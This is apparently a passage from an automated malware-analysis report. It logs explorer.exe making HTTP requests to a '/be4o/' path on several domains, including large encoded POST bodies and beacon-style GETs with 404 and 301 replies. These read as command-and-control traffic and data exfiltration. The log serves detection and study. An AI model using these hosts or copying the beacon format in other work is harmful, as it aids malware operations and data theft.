                                                                                                                                                                                                                              Data Ascii: 53zyAWYYo7mh4mKv8y5WuMKHqVkNKauWxBer5BcAPW8Njk6LHdFsWP4EsQPcgkEud9(uWbVTtATf3OTEltyxBJzxjnfiJFN-jHs0(jjL999CRpdO~a7IHwoamOpJwQea94keHw6ANCjg1hwKQ71vcuKDHlRo4LGkvMCQz6MPn3fYvlUmAtCpI3q2Iewtn692Wn(T4UUGjod_hL1C9BiIiJwFHCIq1tPzMABnNoY8j2KOcMNoTeq
                                                                                                                                                                                                                              Feb 21, 2022 16:55:23.903737068 CET10456OUTData Raw: 61 4b 59 5f 46 30 39 31 32 78 4d 6d 6c 5f 61 73 76 44 4f 61 49 33 55 43 73 52 6e 66 4d 38 33 56 54 75 76 46 76 5f 32 52 66 45 52 6a 33 69 7e 2d 56 38 51 62 70 73 32 75 63 68 6e 65 36 45 47 54 42 53 64 58 52 56 4e 71 37 37 47 32 48 49 73 34 4a 50
                                                                                                                                                                                                                              Data Ascii: aKY_F0912xMml_asvDOaI3UCsRnfM83VTuvFv_2RfERj3i~-V8Qbps2uchne6EGTBSdXRVNq77G2HIs4JPugnhZPLQzCeJ~mzWq-sV9q~X(P81yfdwTJ0AHTViy6Jqp3DX~m8-L31wbyNnSmHuFSM-eiMYIKP6L-xMYRD2mhATAGd4E1cZQFzTyTd1kpS8p-3ayBAyCHq_5onY~PGikp3HuCQapyv-6-Lmzkxvw8ywtxYTH8Z6j
                                                                                                                                                                                                                              Feb 21, 2022 16:55:23.903835058 CET10459OUTData Raw: 47 6f 50 55 4e 6f 6e 77 49 51 59 57 34 71 66 55 7e 55 4a 42 30 32 6e 46 4d 33 47 4e 76 6e 7a 53 77 5a 77 68 55 4e 39 66 6f 50 4c 63 4e 61 42 50 48 39 6e 6b 48 65 39 78 31 65 6b 38 73 42 68 61 33 64 34 39 4f 5f 65 7a 48 58 28 4d 28 64 30 59 28 4f
                                                                                                                                                                                                                              Data Ascii: GoPUNonwIQYW4qfU~UJB02nFM3GNvnzSwZwhUN9foPLcNaBPH9nkHe9x1ek8sBha3d49O_ezHX(M(d0Y(Om3mXuKRPPg0dUxWq6KUxGydPfcREe43pxJtpX_DFLQ~u8t93QQu1QhAZKp04XyqlkDVPob3t3d3k8kn7m53tvo0o4JD-aGSUtgZa4fqW8CpOHeWJyW6qeL252FKZ7aivvM1jDdW8OzbnWfmjqztRPbnE5GXNHXMhJ
                                                                                                                                                                                                                              Feb 21, 2022 16:55:23.904175043 CET10462OUTData Raw: 41 52 61 71 28 6b 7a 5a 7a 45 7a 33 6c 41 36 6c 7a 67 77 72 66 42 39 6b 41 66 63 59 47 30 64 74 6a 61 37 35 37 72 37 6c 79 57 6e 4f 34 43 28 76 30 6e 6e 4f 68 2d 34 73 76 42 65 4b 31 47 59 63 79 58 59 41 75 51 6f 31 79 6f 49 6f 6f 55 51 63 5a 73
                                                                                                                                                                                                                              Data Ascii: ARaq(kzZzEz3lA6lzgwrfB9kAfcYG0dtja757r7lyWnO4C(v0nnOh-4svBeK1GYcyXYAuQo1yoIooUQcZsaZMCS5N_rxPq(-giRJTbQoC8c5Zq5sEaCeOV92WYEL~mHp1yYU9rjsSukGct81Jx0cKxD6146f6C(SG6trDgBesUfBwq7IeLyKyzOdT4UMV5Qx~nQTTSbbAq~FGiWynYF63LrkmLC3mJ(PMjLVKndGL0eH(Zaalpy
                                                                                                                                                                                                                              Feb 21, 2022 16:55:24.059092045 CET10465OUTData Raw: 37 33 38 31 78 73 55 4f 6c 4e 44 59 67 42 6b 2d 77 38 6d 37 35 67 56 59 41 71 65 34 43 48 45 79 77 33 78 37 69 4c 44 63 45 78 62 74 62 4a 61 32 67 56 63 59 66 52 6c 58 7e 77 76 65 79 41 64 5a 7e 73 62 5a 4c 76 76 7a 6f 30 5a 63 35 52 33 6c 47 6a
                                                                                                                                                                                                                              Data Ascii: 7381xsUOlNDYgBk-w8m75gVYAqe4CHEyw3x7iLDcExbtbJa2gVcYfRlX~wveyAdZ~sbZLvvzo0Zc5R3lGj0oB1(yZUNHd1CvRdlBMn4z~E2VTNiqSN3jqusA4nX3QGo75-1In0xsQGvMr0YXN1CH1OHAKKLvTb~GX848PtsOS2sKzcxVDE~EOqauKdLpf5iSZUsg803m6dzXkvi2KAKNNtd6GFwBJQwMUHOsctw7XTKDO8163un
                                                                                                                                                                                                                              Feb 21, 2022 16:55:24.497716904 CET10600INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:23 GMT
                                                                                                                                                                                                                              Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                              Content-Length: 277
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 72 65 73 64 78 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.buresdx.com Port 80</address></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              41192.168.11.204984066.29.154.15780C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:55:25.911765099 CET10601OUTGET /be4o/?h48Hl=CBV85lUl5iGXXllmWETcgzTRYTuU0jkLI/xLLa4RVPF6HDjlZoPpCKC/374THXhEpvSN&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.buresdx.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:55:26.128814936 CET10601INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:25 GMT
                                                                                                                                                                                                                              Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                              Content-Length: 277
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 72 65 73 64 78 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.buresdx.com Port 80</address></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              42192.168.11.2049841142.250.186.5180C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:55:32.999233961 CET10603OUTPOST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.eaglesaviationexperience.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.eaglesaviationexperience.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.eaglesaviationexperience.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              Data Raw: 68 34 38 48 6c 3d 70 78 41 6a 59 43 7a 58 52 71 66 54 56 37 33 54 5a 50 44 37 28 73 51 38 28 4d 61 38 6d 72 4a 66 6a 4b 69 2d 79 41 31 5f 4f 36 41 49 68 58 4c 34 4f 55 52 32 65 4c 6a 46 69 4f 62 47 68 2d 7e 4d 76 43 68 72 32 77 64 36 79 47 44 57 34 4e 32 65 41 4f 45 58 68 2d 6a 53 36 30 41 74 41 61 54 38 30 6d 56 74 53 4d 6a 5a 43 66 76 6f 70 57 78 32 49 35 55 72 36 7a 50 56 6a 34 68 4a 5a 61 41 63 70 35 30 35 54 7a 52 58 39 66 58 67 69 4b 6d 47 6f 63 46 67 31 36 32 65 68 67 28 70 4e 31 72 37 4f 37 4e 32 74 7a 6e 33 47 50 49 55 34 57 73 32 6b 2d 28 73 31 45 7e 58 4b 38 30 5a 44 76 4f 6e 53 48 66 4e 36 56 36 72 6e 51 41 41 72 6e 6c 6a 4c 6a 53 59 6e 6d 46 69 57 6d 4e 35 7a 55 6d 52 69 33 62 6c 53 78 47 34 53 67 62 55 56 78 71 35 6f 52 47 42 69 7a 34 65 5a 66 46 4e 4a 56 62 35 4e 56 43 53 36 54 79 6d 56 75 7a 38 71 33 56 48 44 63 77 54 28 6e 41 6a 6c 4f 4c 57 41 62 28 68 28 64 55 72 4e 68 59 6d 30 70 66 73 64 32 7a 4f 36 6f 43 66 48 36 41 4e 4d 4e 71 39 4e 73 35 6e 4e 54 6b 4f 44 4a 34 72 6b 73 32 6a 64 68 33 70 51 34 41 57 4d 6e 33 72 77 34 50 4a 72 77 77 5f 6f 65 37 4d 57 39 46 4e 6c 5a 34 6f 33 57 45 30 64 4b 35 73 6e 69 4f 73 52 54 5a 6b 68 78 43 61 6c 48 56 36 32 2d 7e 32 6f 7a 28 76 64 75 73 6e 31 34 77 4b 67 33 51 75 77 4b 30 31 49 2d 36 50 51 4f 43 32 31 74 6e 57 49 37 72 61 61 50 75 50 61 58 4c 39 73 65 4c 4a 77 68 51 48 66 4b 53 4c 43 76 7a 34 38 76 53 58 30 48 45 53 52 68 38 6a 45 4b 31 59 44 51 28 49 4e 46 58 73 51 45 43 61 49 2d 67 69 77 53 4d 79 52 78 51 51 37 76 55 30 55 70 44 54 47 73 43 51 79 4a 47 48 4e 62 6e 6d 6f 65 71 45 52 39 53 79 52 52 44 51 33 45 67 4f 66 51 43 74 67 2d 65 30 76 59 4d 75 46 63 4f 51 4d 53 53 37 32 41 67 5a 38 6c 34 37 64 64 72 5f 4d 71 41 37 42 7a 77 74 67 4e 7a 46 56 4e 49 49 61 33 55 6d 35 50 7e 72 38 56 78 73 49 6b 71 72 79 76 57 67 36 45 4d 57 55 73 46 6c 4e 67 62 37 56 7a 28 43 6b 6d 71 73 49 36 4e 42 7a 49 6f 6b 73 4c 4b 6a 71 5a 57 6d 58 50 62 4b 51 4a 57 6a 78 77 37 75 78 7a 61 36 38 4c 61 6c 47 66 38 52 64 34 41 45 51 31 50 2d 6b 45 79 41 66 41 59 43 59 66 48 37 42 5f 63 48 6a 39 6c 74 36 38 56 4d 58 53 56 78 42 74 53 76 6a 7a 38 6d 35 4f 74 7a 4e 56 38 38 43 53 78 72 58 4b 4d 30 4d 50 36 4d 6f 6c 6d 64 53 36 33 4e 76 75 37 65 79 77 72 75 6d 35 30 57 53 76 47 63 30 56 50 34 31 39 6e 43 62 41 57 33 67 62 6c 57 39 4d 59 7a 64 63 74 33 79 62 6b 39 76 30 72 39 32 55 6f 74 5a 66 4b 66 55 78 7e 6a 54 49 65 5f 66 44 36 43 6c 48 58 46 69 7a 6c 57 4f 4f 4b 6b 59 44 34 5a 34 44 7e 47 6f 4f 7a 6f 32 57 79 44 39 6c 75 4e 56 68 76 35 6f 74 78 44 33 57 41 73 6c 38 59 49 68 66 56 58 46 63 67 74 31 77 56 4f 71 73 7e 59 65 57 66 66 75 75 76 39 4f 76 51 74 79 77 39 59 51 6d 77 52 64 6d 43 2d 74 41 4c 45 46
                                                                                                                                                                                                                              Data Ascii: h48Hl=pxAjYCzXRqfTV73TZPD7(sQ8(Ma8mrJfjKi-yA1_O6AIhXL4OUR2eLjFiObGh-~MvChr2wd6yGDW4N2eAOEXh-jS60AtAaT80mVtSMjZCfvopWx2I5Ur6zPVj4hJZaAcp505TzRX9fXgiKmGocFg162ehg(pN1r7O7N2tzn3GPIU4Ws2k-(s1E~XK80ZDvOnSHfN6V6rnQAArnljLjSYnmFiWmN5zUmRi3blSxG4SgbUVxq5oRGBiz4eZfFNJVb5NVCS6TymVuz8q3VHDcwT(nAjlOLWAb(h(dUrNhYm0pfsd2zO6oCfH6ANMNq9Ns5nNTkODJ4rks2jdh3pQ4AWMn3rw4PJrww_oe7MW9FNlZ4o3WE0dK5sniOsRTZkhxCalHV62-~2oz(vdusn14wKg3QuwK01I-6PQOC21tnWI7raaPuPaXL9seLJwhQHfKSLCvz48vSX0HESRh8jEK1YDQ(INFXsQECaI-giwSMyRxQQ7vU0UpDTGsCQyJGHNbnmoeqER9SyRRDQ3EgOfQCtg-e0vYMuFcOQMSS72AgZ8l47ddr_MqA7BzwtgNzFVNIIa3Um5P~r8VxsIkqryvWg6EMWUsFlNgb7Vz(CkmqsI6NBzIoksLKjqZWmXPbKQJWjxw7uxza68LalGf8Rd4AEQ1P-kEyAfAYCYfH7B_cHj9lt68VMXSVxBtSvjz8m5OtzNV88CSxrXKM0MP6MolmdS63Nvu7eywrum50WSvGc0VP419nCbAW3gblW9MYzdct3ybk9v0r92UotZfKfUx~jTIe_fD6ClHXFizlWOOKkYD4Z4D~GoOzo2WyD9luNVhv5otxD3WAsl8YIhfVXFcgt1wVOqs~YeWffuuv9OvQtyw9YQmwRdmC-tALEF
                                                                                                                                                                                                                              Feb 21, 2022 16:55:32.999286890 CET10608OUTData Raw: 6b 4c 51 74 46 4a 72 6a 37 57 61 49 6f 36 75 6d 75 71 6a 33 67 55 54 58 36 72 6e 45 36 66 52 77 32 62 77 52 62 67 5f 6f 4e 45 42 43 67 64 79 6c 50 4f 48 6b 2d 4e 65 4e 74 75 50 4c 42 47 41 75 70 70 46 58 35 6b 5f 54 54 61 38 65 51 62 74 39 47 46
                                                                                                                                                                                                                              Data Ascii: kLQtFJrj7WaIo6umuqj3gUTX6rnE6fRw2bwRbg_oNEBCgdylPOHk-NeNtuPLBGAuppFX5k_TTa8eQbt9GFbHy9AbcXLlhQUq2ovceF3cpSuz_c0Vh0r~qU-H3pRp4VKYB5GEGikqIA5stStp3qOPOh7aNeeTB9sMi0JNbKLKK2_2ebWZoVMkly_B5XffkH-qv(fJCJgn01cInAFb2BzPBk3BxwNZRlfPJL67ZjJVsXCCm7sQeE6
                                                                                                                                                                                                                              Feb 21, 2022 16:55:32.999335051 CET10615OUTData Raw: 6f 37 62 31 33 39 65 76 5f 28 79 74 43 46 63 45 44 28 75 48 43 6b 6e 4e 79 5a 63 63 44 74 4c 41 73 49 5f 4a 37 4b 32 4a 75 61 42 4c 37 6c 5f 44 68 50 61 65 4e 35 50 67 5a 34 57 61 61 49 71 46 37 6a 77 64 38 61 57 41 73 68 43 39 69 6e 43 57 56 36
                                                                                                                                                                                                                              Data Ascii: o7b139ev_(ytCFcED(uHCknNyZccDtLAsI_J7K2JuaBL7l_DhPaeN5PgZ4WaaIqF7jwd8aWAshC9inCWV6xiQpfG_a5v6whvTxNoJOKejAXqlnAXo29Ca~Y9aueabrmorf2J4XozRyA2OTwCn0c9ofxlOlc1tNUTkSjzFELPWKDsjZrHRfeGbUMtKkuQGgzlTHJwzNAmxGIcBqQHVtTYa8upeDD5MKFWG9Yj574~gCCAF~Q2OU4
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.009676933 CET10618OUTData Raw: 42 75 63 6f 52 6f 34 36 76 39 38 32 75 4a 4e 59 35 6e 77 51 62 56 69 57 58 55 79 4d 32 67 71 66 47 33 4a 32 6b 36 45 52 47 58 64 4d 32 66 55 42 42 30 35 61 6f 31 56 34 6b 65 38 45 34 53 78 66 5f 79 70 7e 48 6a 6c 58 66 61 50 56 35 4d 5f 66 49 42
                                                                                                                                                                                                                              Data Ascii: BucoRo46v982uJNY5nwQbViWXUyM2gqfG3J2k6ERGXdM2fUBB05ao1V4ke8E4Sxf_yp~HjlXfaPV5M_fIBgEL8ps1WSTzSC1fVP0w7ci2FinbJMh0WTsPJKxeRSIF2s~JfY7Noo(8f4STMjnJJ6NSkWKrkibAZKqd6rmUO9zpnFBN~6O8KHatBhIqkPJwoKO2q7UO5uyZOcXq0jlqFna1iEmQw1smLSDDxuqEambNd0kW(Y9fKE
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.009738922 CET10625OUTData Raw: 50 79 72 74 46 4f 64 4e 4e 6f 75 48 5a 4b 6f 56 5a 56 35 71 44 63 76 72 43 36 65 35 61 32 59 75 35 4d 65 6f 57 70 37 4f 39 64 4d 39 67 4e 46 41 72 70 74 4a 45 6f 67 35 52 34 32 4a 72 76 4a 4d 48 6c 6f 4f 77 6a 71 50 6c 49 68 58 36 66 61 44 6e 77
                                                                                                                                                                                                                              Data Ascii: PyrtFOdNNouHZKoVZV5qDcvrC6e5a2Yu5MeoWp7O9dM9gNFArptJEog5R42JrvJMHloOwjqPlIhX6faDnw12PfgxbzUP2K7pkqFBo509Z~2kI(lrN1JDeI-f4CH~pE0YAdX~ykFVA(xXalKvqTQ34vsF66RKbGi0ImNplSd7qh235pFb7dOcYl0egtd1drrD8BYIG38ZbbqfWeHCY7YBd6Ev90rLsmpmJaC926oVwr9mQz2bcgT
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.009780884 CET10626OUTData Raw: 78 7a 36 44 64 38 65 7a 35 53 42 39 37 39 64 35 72 53 4b 72 6f 33 38 65 38 56 71 48 4f 28 6e 34 42 74 41 4d 73 67 34 69 67 7e 6a 67 34 72 6a 67 48 50 48 71 6c 45 62 6a 34 79 6e 62 50 73 48 77 4f 70 54 73 66 35 49 6e 4b 70 62 32 44 67 55 4c 39 36
                                                                                                                                                                                                                              Data Ascii: xz6Dd8ez5SB979d5rSKro38e8VqHO(n4BtAMsg4ig~jg4rjgHPHqlEbj4ynbPsHwOpTsf5InKpb2DgUL96rqnea3vw7M5UvtaqJWG8vK_Ut2tLshyzt2ReE4TQG4LeVDVSgAlthIUic175_ZSt8t3Pyhnz7ERMl11~OxjDUFs1wrLNCRjPD4e7c5MGshSgc(TFzFvR7~RRG6541EvN6gHRzaymg(bRCV12lgjM7fr(FrRhyriPa
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.009963036 CET10628OUTData Raw: 32 61 6f 78 4c 4a 62 51 76 46 53 7a 67 6b 55 62 52 4b 79 76 53 63 46 4b 35 58 51 77 4b 62 50 42 73 65 43 69 47 72 46 6f 49 62 53 34 55 41 73 49 56 74 6a 4a 43 67 74 6e 31 63 34 47 34 72 36 36 7a 7a 4f 6d 5a 76 77 6b 46 73 6e 74 43 4d 48 33 59 68
                                                                                                                                                                                                                              Data Ascii: 2aoxLJbQvFSzgkUbRKyvScFK5XQwKbPBseCiGrFoIbS4UAsIVtjJCgtn1c4G4r66zzOmZvwkFsntCMH3YhmIj4XHOP9pJhXTG1ZQIS8YeOfpa5uAQsrEU59zZb5cJHHIkTCFbprl8hEx7iUJSIET91vg848jXED(0MZb_JcWaYYo88Eqy6v2i2AQQb1M3YeE7P-s17fAIvghovcbDzz4RyCBGeeurDOSei_BXNRCNx1lx81ICeD
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.010143042 CET10629OUTData Raw: 52 66 73 73 61 44 2d 45 45 37 65 30 70 49 6f 58 73 7a 48 54 62 33 73 38 67 6a 6c 6d 57 53 44 46 37 4d 66 35 63 64 76 77 55 4a 71 51 75 71 6c 61 56 31 6b 37 75 28 44 73 77 47 48 6d 4a 70 64 63 74 48 6e 50 69 75 4d 78 33 6d 4c 53 75 6e 62 74 32 61
                                                                                                                                                                                                                              Data Ascii: RfssaD-EE7e0pIoXszHTb3s8gjlmWSDF7Mf5cdvwUJqQuqlaV1k7u(DswGHmJpdctHnPiuMx3mLSunbt2aojw8jZoRNq75W1my8dPUPllO5b_12T6s6xXRvTVm7aN(0rshnsVsC9qLlmiDx9s6ec484yOZL4-YOOAFHgpOVOjzX2nagC5lNGnh46YAtVidGeBFkcEga3kKlFkegsh4sF-br4IT9VORtK5IkrSOX4MSwBCbFh-Kw
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.010318041 CET10632OUTData Raw: 71 30 4a 39 62 77 59 76 37 4e 77 4f 78 50 5a 49 58 4f 6b 71 2d 41 75 61 69 5a 57 33 4a 73 4d 7a 41 7e 32 63 42 76 6d 41 66 61 70 71 61 67 2d 4d 63 36 4d 4e 71 43 5a 75 32 44 61 61 37 43 75 79 72 51 73 41 6c 61 30 73 7a 63 52 5a 42 59 69 50 32 6a
                                                                                                                                                                                                                              Data Ascii: q0J9bwYv7NwOxPZIXOkq-AuaiZW3JsMzA~2cBvmAfapqag-Mc6MNqCZu2Daa7CuyrQsAla0szcRZBYiP2jOrIRf~Vi2ovW1DJkRWRrEKX~gs1xw0vUx1z5VkT5MijZY0gmd8H4qxZnUUEOa3nIQb4IqSZJ7Rw5NVC3BFLTfrQoBdQFESukvdrnCyAcSWV5YtbdD45M435(0Sx~U1Zozv2NNVjtBgGlefwO0cfmGMpMXYKX-H24e
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.010499001 CET10643OUTData Raw: 6a 43 56 49 66 49 41 6d 6b 6d 4d 45 4c 4f 62 42 44 61 69 74 66 47 52 73 48 43 6c 4d 68 30 33 58 30 61 4a 69 69 67 36 6f 34 75 54 44 79 28 4b 79 39 66 6f 54 62 4b 66 50 46 28 34 49 6d 68 35 35 34 61 76 6f 6a 56 53 34 58 46 35 45 33 78 77 54 33 46
                                                                                                                                                                                                                              Data Ascii: jCVIfIAmkmMELObBDaitfGRsHClMh03X0aJiig6o4uTDy(Ky9foTbKfPF(4Imh554avojVS4XF5E3xwT3F4IMg4odJgZ0puH164Xo29CBXEqzMHFcPeaBGjFTBef7xsh-Dtj3gsWA8D9H6VzM44QedGXeMc~sQYv75I7tOr~k~MqmD0ULEcn-CrN0p5uCUIaE8R0fDSUfCJUxmeUin22axgfFtb5Ddq~FG1IpdWAV5I8McMnM0k
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.020100117 CET10644OUTData Raw: 77 63 77 65 4f 77 77 34 51 42 49 36 4d 7e 4f 32 48 34 38 4a 72 54 4f 41 72 4a 71 56 70 6f 58 46 5a 37 6d 5a 6d 58 55 35 6b 56 61 71 69 71 78 66 67 28 4f 39 35 43 62 61 59 68 4c 4e 35 55 52 50 46 4c 41 77 45 67 6a 77 2d 34 54 58 68 4d 43 79 76 33
                                                                                                                                                                                                                              Data Ascii: wcweOww4QBI6M~O2H48JrTOArJqVpoXFZ7mZmXU5kVaqiqxfg(O95CbaYhLN5URPFLAwEgjw-4TXhMCyv326QHPSfbKn2NShKQVbMJnTbA7bI1PGrCza0sfiVCf0XGElnx1mhw-D9E3fpZHEa2sZmTEL2UoA5Z-7Ts5(trNL3QmK_L9Oa5WRF5DPoM27Vfm3Rx7SY8k4OCXGPzvy0hxJLlmptuu6YfnfAm-J7SmFHgtdsYtxXRf
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.526510954 CET10784INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Content-Type: application/binary
                                                                                                                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:33 GMT
                                                                                                                                                                                                                              Location: https://www.eaglesaviationexperience.com/be4o/
                                                                                                                                                                                                                              Server: ESF
                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              43192.168.11.2049842142.250.186.5180C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.008661985 CET10615OUTGET /be4o/?7nx8=7nN0Wh-H7&h48Hl=mz0ZGmPpQcHdBZrVbfezv7ox+MCQwaRA1qHDhj9nMfECw2TGe1c3Y7+z1tjTr42phwlz HTTP/1.1
                                                                                                                                                                                                                              Host: www.eaglesaviationexperience.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.118576050 CET10783INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Content-Type: application/binary
                                                                                                                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:33 GMT
                                                                                                                                                                                                                              Location: https://www.eaglesaviationexperience.com/be4o/?7nx8=7nN0Wh-H7&h48Hl=mz0ZGmPpQcHdBZrVbfezv7ox+MCQwaRA1qHDhj9nMfECw2TGe1c3Y7+z1tjTr42phwlz
                                                                                                                                                                                                                              Server: ESF
                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              44192.168.11.204984391.184.31.21780C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.192070007 CET10787OUTPOST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.easypeasy.community
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.easypeasy.community
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.easypeasy.community/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
